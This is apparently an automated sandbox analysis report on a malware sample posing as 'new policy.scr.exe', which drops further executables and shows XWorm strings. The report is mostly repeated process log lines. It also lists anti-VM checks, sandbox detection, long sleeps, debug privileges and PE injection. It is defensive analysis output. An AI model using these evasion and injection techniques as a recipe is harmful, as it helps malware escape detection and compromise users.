Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Memory allocated: 1A510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 13F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 4E30000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Window / User API: threadDelayed 4580	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Window / User API: threadDelayed 5192	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: threadDelayed 5225	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: threadDelayed 4600	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: foregroundWindowGot 696	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: foregroundWindowGot 923	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080	Thread sleep count: 4580 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080	Thread sleep count: 5192 > 30	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe TID: 7856	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 3120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477

Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: new policy.scr.exe, 00000000.00000002.1884717220.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: new policy.scr.exe, 00000003.00000002.2862345788.00000000066BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4091977760.00000000007B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\new policy.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\new policy.scr.exe

Code function: 3_2_0145D01C LdrInitializeThunk,

3_2_0145D01C

Enables debug privileges

Source: C:\Users\user\Desktop\new policy.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\new policy.scr.exe	Memory written: C:\Users\user\Desktop\new policy.scr.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 700000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 400000 value starts with: 4D5A	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior

Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000033E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<
Source: new policy.scr.exe, 00000003.00000002.2865661587.000000000714B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager(
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003403000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|>@
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q6k
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx5f
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXGO
Source: new policy.scr.exe, 00000003.00000002.2862287242.000000000669C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
